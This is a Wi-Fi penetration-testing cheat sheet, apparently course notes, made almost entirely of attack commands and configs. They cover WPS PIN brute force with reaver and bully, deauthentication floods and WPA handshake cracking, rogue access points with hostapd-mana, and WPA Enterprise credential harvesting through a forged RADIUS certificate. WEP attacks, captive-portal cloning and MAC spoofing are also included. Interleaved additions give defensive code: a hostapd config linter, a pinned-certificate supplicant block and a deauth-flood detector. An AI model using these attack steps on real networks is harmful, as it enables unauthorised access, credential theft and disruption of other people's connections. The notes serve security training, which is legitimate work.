Contents
- Basic Commands
- Wi-Fi Protected Setup (WPS)
- WPA-PSK
- Rogue Access Points
- WPA Enterprise
- Wired Equivalent Privacy (WEP)
- Bettercap
- Attacking Captive Portals
- Macchanger
Other Notes
- https://gist.github.com/dogrocker/86881d2403fee138487054da82d5dc2e
- https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi
Basic Commands
sudo airmon-ng # reveals wireless device drivers + chipset
sudo lsusb -vv # reveals system USB devices
# Wi-Fi Configuration Utilities
## Wireless devices information
sudo iw list
## Scan for Wireless AP in range (Managed mode only)
sudo iw dev wlan0 scan | grep SSID
## Determining Channel Number
sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:"
## Create new virtual interface [wlan0 device, interface add, name, monitor mode]
sudo iw dev wlan0 interface add wlan0mon type monitor
## Bring up the interface post creation
sudo ip link set wlan0mon up
## Inspect new virtual interface information
sudo iw dev wlan0mon info
## Capture wireless frames via tcpdump
sudo tcpdump -i wlan0mon
## Delete virtual interface
sudo iw dev wlan0mon interface del
## Display regulatory information [power limits, restricted frequencies, manufacturer restrictions]
sudo iw reg get
sudo iw reg set AU # Can be overwritten by AP advertising a country
/etc/default/crda # Modify REGDOMAIN here so it is set at every boot
# Enable or Disable Wireless Devices [Wi-Fi, Bluetooth, Broadband etc.]
## Display all enabled wireless devices
sudo rfkill list
## Soft block/unblock device
sudo rfkill block [ID]
sudo rfkill unblock [ID]
sudo rfkill block all
sudo rfkill unblock all
# Enable and disable monitor mode on wireless devices
sudo airmon-ng
sudo airmon-ng check # list processes that interfere with the tool
sudo airmon-ng check kill # gracefully stop the identified services
# Use dhclient / wpa_supplicant after monitor mode for internet access
# Use hostapd for access point mode
sudo airmon-ng start wlan0 # start monitor mode
sudo airmon-ng start wlan0 3 # start on specified channel
sudo airmon-ng --verbose
sudo airmon-ng --debug
sudo airmon-ng stop wlan0
Wi-Fi Protected Setup (WPS)
- Requirements:
- WPS must be enabled
- WPS must use PIN authentication rather than PBC (Push Button Configuration) or another method
sudo airmon-ng start wlan0 # start monitor mode
sudo airmon-ng start wlan0 3 # start on specified channel
Scan WPS (if Lck == Yes, the WPS attack cannot be used)
sudo wash -i wlan0
sudo wash -i wlan0 -5 # 5 GHz
sudo airodump-ng wlan0 --wps
Attacking WPS
sudo reaver -b 34:08:04:09:3D:38 -i wlan0 -v
sudo reaver -b 34:08:04:09:3D:38 -i wlan0 -v -c [channel] # if stuck on "waiting for beacon"
sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -K # PixieWPS attack add-on
sudo bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
With bully and reaver we can use the -p '' option to check if the PIN is empty
Known default pins
sudo apt install airgeddon
source /usr/share/airgeddon/known_pins.db
echo ${PINDB["0013F7"]} # indexed by the first three bytes of the BSSID; test these manually with reaver or bully
Rainbow Table (Precalculated)
https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/5%20-%20WPA%20and%20WPA2.md
Common issues
WPS Transaction Failure: the PIN was found via PixieWPS, but reaver may need to be restarted without the PixieWPS option
ACK Issues: try a different wireless card with a different chipset
WPS Lock: when WPS is locked, we can do a denial of service on the access point using mdk3 or its successor, mdk4.
WPA-PSK
sudo airmon-ng check kill # kill interrupting services
sudo airmon-ng start wlan0 # monitor mode
sudo airodump-ng wlan0 # identify SSIDs and channels
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon # save output to file
# Deauthentication
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap # crack the hash using aircrack
airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap # decrypt the traffic using password, only works if full handshake is in the packet
# Using hashcat (deprecated)
hashcat -I
hashcat --help
hashcat -b -m 2500 # WPA-EAPOL-PBKDF2
hashcat -m 2500 output.hccapx /usr/share/john/password.lst # only works with full WPA handshake
sudo apt install hashcat-utils # deprecated
/usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx # exports WPA handshakes from PCAP files to HCCAPx
https://github.com/ZerBea/hcxtools # apt install hcxtools
/usr/bin/hcxpcapngtool wpa-02.cap -o output
hashcat -m 22000 output /usr/share/john/password.lst # needs 4GB ram
./john --wordlist=<Wordlist> --rules --stdout | aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName> # JTR
john --wordlist=/usr/share/john/password.lst --rules --stdout | grep -i Password123
john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap
# Can also use crunch or RSMangler
Rogue Access Points
sudo airodump-ng -w discovery --output-format pcap wlan0 # capture and save output
# Wireshark
wlan.fc.type_subtype == 0x08 && wlan.ssid == "Test" # Find beacon packets, filter using "Tagged Parameters"
# Rogue AP
sudo apt install hostapd-mana
Test-mana.conf
------------------------
interface=wlan0
ssid=Test
channel=1
hw_mode=g # or 'a' for 5 GHz
ieee80211n=1
wpa=3 # for WPA and WPA2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP CCMP # WPA
rsn_pairwise=TKIP CCMP # WPA2
mana_wpaout=/home/kali/mostar.hccapx
# WPA3 downgrade attack
# wpa value should be set to "2", there shouldn't be a wpa_pairwise parameter, and rsn_pairwise should be set to "CCMP" only
------------------------
sudo hostapd-mana Test-mana.conf # start rogue AP
sudo aireplay-ng -0 0 -a FC:7A:2B:88:63:EF wlan1mon # deauthenticate all clients continuously (channel 1)
aircrack-ng mostar.hccapx -e Mostar -w /usr/share/john/password.lst # crack password hash
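The Test-mana.conf above deliberately advertises WPA1 and TKIP so that any client will associate. The same settings on a real AP are what the handshake capture, deauth and downgrade steps in these notes depend on. The following linter, an added example rather than anything from the notes or from hostapd-mana, parses a hostapd-style config (SAMPLE_CONF reuses the values of Test-mana.conf), reports the weak settings, and produces the hardened equivalent (wpa=2, CCMP only, WPS off, PMF required). The 16-character passphrase cut-off is a heuristic chosen here, not a hostapd rule.

```python
SAMPLE_CONF = """\
interface=wlan0
ssid=Test
channel=1
hw_mode=g # or 'a' for 5 GHz
wpa=3 # for WPA and WPA2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP CCMP # WPA
rsn_pairwise=TKIP CCMP # WPA2
"""

def parse_hostapd(text):
    """Parse key=value lines; trailing '# ...' comments are stripped as written above."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def lint_hostapd(conf):
    """Return (key, finding) pairs for settings that the attacks in these notes rely on."""
    findings = []
    wpa = int(conf.get("wpa", "0"))
    if wpa == 0:
        findings.append(("wpa", "no WPA: traffic is unencrypted"))
    elif wpa & 1:  # wpa=1 or wpa=3 both advertise WPA1
        findings.append(("wpa", "WPA1 enabled: allows downgrade to TKIP; set wpa=2"))
    for key in ("wpa_pairwise", "rsn_pairwise"):
        if "TKIP" in conf.get(key, "").split():
            findings.append((key, "TKIP cipher allowed; use CCMP only"))
    if conf.get("wps_state", "0") != "0":  # hostapd default: WPS disabled
        findings.append(("wps_state", "WPS enabled: exposed to PIN brute force (reaver/bully)"))
    if conf.get("ieee80211w", "0") != "2":  # 2 = protected management frames required
        findings.append(("ieee80211w", "PMF not required: deauth frames are unauthenticated"))
    if "wpa_passphrase" in conf and len(conf["wpa_passphrase"]) < 16:  # heuristic cut-off
        findings.append(("wpa_passphrase", "short passphrase: cheap to crack from a captured handshake"))
    return findings

def harden_hostapd(conf):
    """Copy of conf with WPA2/CCMP only, WPS off and PMF required (passphrase left to the admin)."""
    out = {k: v for k, v in conf.items() if k != "wpa_pairwise"}
    out.update({"wpa": "2", "rsn_pairwise": "CCMP", "wps_state": "0", "ieee80211w": "2"})
    return out

if __name__ == "__main__":
    for key, finding in lint_hostapd(parse_hostapd(SAMPLE_CONF)):
        print(f"{key}: {finding}")
```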
WPA Enterprise
# Follow this if stuck
https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/6%20-%20WPA%20enterprise.md
sudo airodump-ng wlan0 # enumerate channels
# Wireshark
openssl x509 -in CERT_FILENAME -noout -enddate # determine expiration date of certificate
openssl x509 -inform der -in CERTIFICATE_FILENAME -text # display information in certificate
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt # convert to PEM format, which is base64 of der
# Capturing certificate
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon # save output to file
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon # deauthentication of user to capture certificate
# Retrieving certificate
sudo airmon-ng stop wlan0 # stop monitor mode
# Wireshark
# search tls.handshake.certificate || tls.handshake.type == 11
# 'Handshake Protocol: Certificate'
# right click and select Export Packet Bytes to save the data into a file with a .der extension
# RADIUS Server and modify certificate
sudo apt install freeradius
sudo -s
cd /etc/freeradius/3.0/certs
nano ca.cnf # modify certificate authority
...
[certificate_authority]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = ca@playtronics.com
commonName = "Playtronics Certificate Authority"
...
nano server.cnf # modify server file
...
[server]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = admin@playtronics.com
commonName = "Playtronics"
...
root@kali:/etc/freeradius/3.0/certs# rm dh # regenerate 2048-bit Diffie-Hellman parameters instead of the 1024-bit default
root@kali:/etc/freeradius/3.0/certs# make # use "make destroycerts" to reset
# Creating rogue AP server
sudo apt install hostapd-mana
# /etc/hostapd-mana/mana.conf --> See mana.conf file
# /etc/hostapd-mana/mana.eap_user --> See mana.eap_user
sudo hostapd-mana /etc/hostapd-mana/mana.conf
sudo hostapd-mana /etc/hostapd-mana/mana.conf -B # background
# Credentials
/tmp/hostapd.credout
asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst # cracking
# Attack escalation
+ crackapd # let users connect to rogue AP
+ # allow internet access + DHCP and nftable rules
+ # authenticate to the real AP
+ # keep deauthenticating until user connects to fake AP
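The credential harvest above only works when the client accepts whatever certificate the rogue RADIUS server presents. A wpa_supplicant network block that pins the enterprise CA and the server name, added here as an example and not taken from the notes or from any project config; the SSID, identity, CA path and server name are assumed values:

```conf
network={
    ssid="corp_wifi"
    scan_ssid=1
    key_mgmt=WPA-EAP
    # require protected management frames so spoofed deauth frames are dropped
    ieee80211w=2
    eap=PEAP
    identity="user@corp.example"
    password="REPLACE_ME"
    # only trust the enterprise CA, not the system store
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    # the server certificate's subject/SAN must end in this name
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
```

With ca_cert and domain_suffix_match set, the supplicant aborts the TLS tunnel before sending the MSCHAPv2 response, so there is nothing for asleap to crack.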
Wired Equivalent Privacy (WEP)
# Sometimes aircrack doesn't return the ascii version of the key but we can connect to the network with the hex (without the ":" ).
# Follow this if stuck: https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/4%20-%20WEP.md
sudo airmon-ng start wlan0 # monitor mode
# Scan for WEP networks
sudo airodump-ng --encrypt WEP $wlan_interface
sudo airodump-ng --bssid <bssid> --channel <channel> --write out wlan0mon
# Gather a large amount of IVs
sudo airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface
# Fake authentication
sudo aireplay-ng --fakeauth 0 -a <AP bssid> -h <MAC wlan0mon> wlan0mon
sudo aireplay-ng --fakeauth 0 -a CC:32:E5:EB:E2:E0 wlan0
# Deauth clients
sudo aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface
# ARP Replay
sudo aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface
# Fragment
sudo aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface
# Chop chop
sudo aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface
# Shared key authentication (requires MAC spoofing of legitimate user, or capture authentication of user and downgrade using plaintext attack)
aircrack-ng [file-name].cap # crack the hash
Bettercap
sudo apt install bettercap
sudo bettercap -iface wlan0 # needs monitor mode and airmon-ng check kill first
# commands
help
clear
wifi.recon on
wifi.show
set ticker.commands "clear; wifi.show" # execute periodically
ticker on
ticker off # after enough data is obtained
# sorting
set wifi.show.sort clients desc
set wifi.show.filter "WPA2"
# recon
wifi.recon c6:2d:56:2a:53:f8
wifi.show # show clients
set wifi.show.filter ^c0 # begins with
set wifi.rssi.min -49 # min signal strength
# deauth
wifi.deauth c6:2d:56:2a:53:f8
wifi.deauth ac:22:0b:28:fd:22 # specific client
wifi.recon off
get wifi.handshakes.file
set wifi.handshakes.file "/home/kali/handshakes/"
set wifi.handshakes.aggregate false
wifi.recon on
wifi.deauth c6:2d:56:2a:53:f8
Caplets + Web Interfaces
sudo bettercap -iface wlan0 -eval "set ticker.commands 'clear; wifi.show'; wifi.recon on; ticker on"
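Every section above that captures a handshake (aireplay-ng -0, hostapd-mana plus aireplay-ng, wifi.deauth) relies on sending a burst of unauthenticated deauthentication frames. That burst is the signal a wireless IDS looks for. The detector below is an added example, not code from the notes or from any of the tools named here: it parses raw 802.11 management headers, keeps per-BSSID timestamps of deauth/disassoc frames, and alerts when a sliding window exceeds a threshold. The sample capture is constructed in memory (frames are never transmitted) and reuses the BSSIDs that appear in the notes.

```python
from collections import defaultdict
import struct

DEAUTH, DISASSOC, BEACON = 0xC, 0xA, 0x8  # 802.11 management subtypes

def parse_mgmt(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame, else None.
    Header layout: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2), body at 24."""
    if len(frame) < 24 or ((frame[0] >> 2) & 0x3) != 0:  # type bits must be 0 (mgmt)
        return None
    subtype = frame[0] >> 4
    mac = lambda off: ":".join(f"{b:02x}" for b in frame[off:off + 6])
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]  # reason code, little endian
    return subtype, mac(4), mac(10), mac(16), reason

def detect_floods(frames, window=5.0, threshold=10):
    """frames: iterable of (timestamp, raw_bytes). Returns {bssid: count} for each BSSID
    with >= threshold deauth/disassoc frames in any `window` seconds (a healthy AP sends
    a handful; aireplay-ng -0 0 or wifi.deauth sends dozens per second)."""
    times_by_bssid = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed and parsed[0] in (DEAUTH, DISASSOC):
            times_by_bssid[parsed[3]].append(ts)  # addr3 carries the BSSID for these frames
    alerts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        worst = start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            worst = max(worst, end - start + 1)
        if worst >= threshold:
            alerts[bssid] = worst
    return alerts

def _frame(subtype, addr1, addr2, addr3, reason=7):
    """Constructed in-memory management frame used only as sample data."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    hdr = bytes([subtype << 4, 0, 0, 0]) + mac(addr1) + mac(addr2) + mac(addr3) + b"\x00\x00"
    return hdr + (struct.pack("<H", reason) if subtype in (DEAUTH, DISASSOC) else b"")

def sample_capture():
    """Constructed capture: 12 broadcast deauths in ~1 s spoofed from the AP used in the
    notes above, one benign deauth from another BSSID, and a few beacons."""
    ap, other, bcast = "34:08:04:09:3d:38", "c6:2d:56:2a:53:f8", "ff:ff:ff:ff:ff:ff"
    frames = [(i * 0.1, _frame(DEAUTH, bcast, ap, ap)) for i in range(12)]
    frames.append((3.0, _frame(DEAUTH, "00:18:4d:1d:a8:1f", other, other, reason=3)))
    frames += [(i * 0.5, _frame(BEACON, bcast, ap, ap)) for i in range(5)]
    return frames
```

Feed it frames read from the airodump-ng pcap produced by `-w discovery --output-format pcap` (strip the radiotap header first) to test it against a real capture.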
Kismet
sudo apt install kismet
Attacking Captive Portals (Not really examinable)
sudo airmon-ng start wlan0 # monitor mode
sudo airodump-ng -w discovery --output-format pcap wlan0 # capture networks
sudo aireplay-ng -0 0 -a 00:0E:08:90:3A:5F wlan0mon # deauth client
sudo apt install apache2 libapache2-mod-php # install Apache and PHP
wget -r -l2 https://www.megacorpone.com # download front-end directories
# copying assets
sudo cp -r ./www.megacorpone.com/assets/ /var/www/html/portal/
sudo cp -r ./www.megacorpone.com/old-site/ /var/www/html/portal/
Macchanger
sudo apt install macchanger
macchanger -h
macchanger --mac XX:XX:XX:XX:XX:XX
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
Return to Normal
sudo airmon-ng stop wlan0
service networking restart
service network-manager restart
Connecting to Wireless AP
# For all config files: https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/0%20-%20connect%20to%20networks.md
# Open Authentication
network={
ssid="hotel_wifi"
scan_ssid=1
}
# WPA-PSK
network={
ssid="home_network"
scan_ssid=1
psk="correct battery horse staple"
key_mgmt=WPA-PSK
}
sudo wpa_supplicant -i wlan0 -c wifi-client.conf [-B for background]
sudo dhclient wlan0 # dhcp
Setting up access point
sudo iw list
sudo ip link set wlan0 up # setting up static ip
sudo ip addr add 10.0.0.1/24 dev wlan0
---dnsmasq.conf # for dhcp
# Main options
# http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html
domain-needed
bogus-priv
no-resolv
filterwin2k
expand-hosts
domain=localdomain
local=/localdomain/
# Only listen on this address. When specifying an
# interface, it also listens on localhost.
# We don't want to interrupt any local resolution
listen-address=10.0.0.1
# DHCP range
dhcp-range=10.0.0.100,10.0.0.199,12h
dhcp-lease-max=100
# Router: wlan0
dhcp-option=option:router,10.0.0.1
dhcp-authoritative
# DNS: Primary and secondary Google DNS
server=8.8.8.8
server=8.8.4.4
---
sudo dnsmasq --conf-file=dnsmasq.conf
Cracking WPA2-Managed Handshakes
- Copy the username:hash sections from /etc/hostapd-wpe/hostapd-wpe.log into another file and run john or hashcat
- john:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep jtr | cut -f 4 | sort -u -t: -k1,1 > /tmp/jtr.txt
john /tmp/jtr.txt --wordlist=/usr/share/wordlists/rockyou.txt
- hashcat:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep hashcat | cut -f 3 | sort -u -t: -k1,1 > /tmp/hcat.txt
hashcat -m 5500 /tmp/hcat.txt /usr/share/wordlists/rockyou.txt
Creating Custom Dictionaries
- Create words.txt with the seed words (e.g. targetap)
- Permute this wordlist with l33tsp34k rules
john --wordlist=words.txt --rules=NT --stdout | sort -u > dictionary1.txt
john --wordlist=dictionary1.txt --rules=l33t --stdout | sort -u > dictionary2.txt
john --wordlist=dictionary2.txt --rules=l33t --stdout | sort -u > dictionary3.txt
john --wordlist=dictionary3.txt --rules=l33t --stdout | sort -u > dictionary4.txt
Decrypting WPA2 Traffic
- Decrypt with
airdecap-ng -e TargetAP -b 18:80:90:6E:E7:A4 -p "APPassword" ch11-05.cap
- Tip: You can leave airodump running to continue capture while you work at decrypting.
- Open with Wireshark
wireshark ch11-05-dec.cap
- Try some basic filters
tcp.port eq 80
tcp.port eq 21
Connecting to Wireless Networks
wpa_passphrase "TargetAP" "12345678" > TargetAP.conf
sudo wpa_supplicant -i wlan0mon -c TargetAP.conf -d
iwconfig # check status
